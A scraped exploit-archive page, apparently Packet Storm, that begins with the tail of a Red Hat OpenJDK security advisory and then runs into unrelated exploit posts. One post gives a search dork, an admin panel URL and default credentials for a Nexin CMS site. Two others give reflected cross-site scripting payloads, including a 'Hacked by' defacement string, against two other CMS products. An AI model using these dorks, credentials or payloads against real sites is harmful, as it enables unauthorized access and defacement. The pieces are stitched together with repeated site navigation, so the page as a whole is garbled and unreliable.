java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.382.b05-2.el8.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.382.b05-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHuAAoJENzjgjWX9erEUJYP/jkZdIhbmjqH+uCTpNJuwb1c  
eOKPR22sdxlbJ/wFtE7aZ8AJggn9L7K4nWHtvGLjegWkV09AYbPJr1I1LDLsXVlo  
aQ1RrVBoa1CUdLkhY6Fo5a2zDKpj+lWjoGaqXcap+od414BaXiaJpxERT5LoOUl3  
fsz79Vg2XZSOwoYOHFwHI/PL7E5B+8XqFuqQNF/lF+uKHpmN2P7pGV8cWfcnwLoR  
w732IjGr6Obe6ck20doQJ9lSAHDYbch3xB8aJfGf4t/yl9HvcvE11R+wWUilBP7s  
kYci5f6LVrb2PMXbH1vSTAkxjQS7QxAOZ5Ud1+wNJQddbChH4/NiMa/EHp9Iq9lH  
5rJWcyC9PR9FiDsEaNeDVmQXixPL5l5U1SzeRXpTpysi7D3LG7Ny/Xm51xIE9g5Z  
baSL1+m5SZhJ4k+l9gg/GUmMB4zDZeM5azQBTJb0IJXmwUpolosPIv3qX3Jj+1mE  
CZ54F2oMsGXcPvT7AV5n2VUQknoOBsP8Ib59jjaVY54sYj/797hvk3H4XSGxIOfw  
vGdmpFei1Rx2lY1ySJz1DYhc2A7VoSxfjboHYkA8Mcp4UHBUY+JXU7Bcl7qcJCba  
HcBYVyhX4bukSA4Lvnj6IsAhu2ZYXD/x1rcYD4s3HQ54NUNMEnhdMLBPmapGnUiy  
YmJbOTz4BQCkA/jbLfu7  
=Blth  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4176-01

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

Posted Jul 20, 2023

Authored by indoushka

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | e614477d10fc119020f0bb6bfcef55d3cf59f2217502dd441fe065c9b47251c1

Download | Favorite | View

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS Nexin Adminisztrációs Központ v1.2 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : Nexin Adminisztrációs Központ v1.2                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://discocenterhu/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

CMS NaiveScripters version 3.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS NaiveScripters v3.0.1 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /events.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/oceannstuedubd/events.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS NaiveScripters 3.0.1 Cross Site Scripting

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

**CMS iQ-Digital 2.0 Cross Site Scripting**

Posted Jul 20, 2023

Authored by indoushka

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3320c1901d54ffd35aac7dcb03095b447934214a707ed6d7ebb3179839c2a7c6

Download | Favorite | View

**CMS iQ-Digital 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMS iQ-Digital v2.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Source

Packet Storm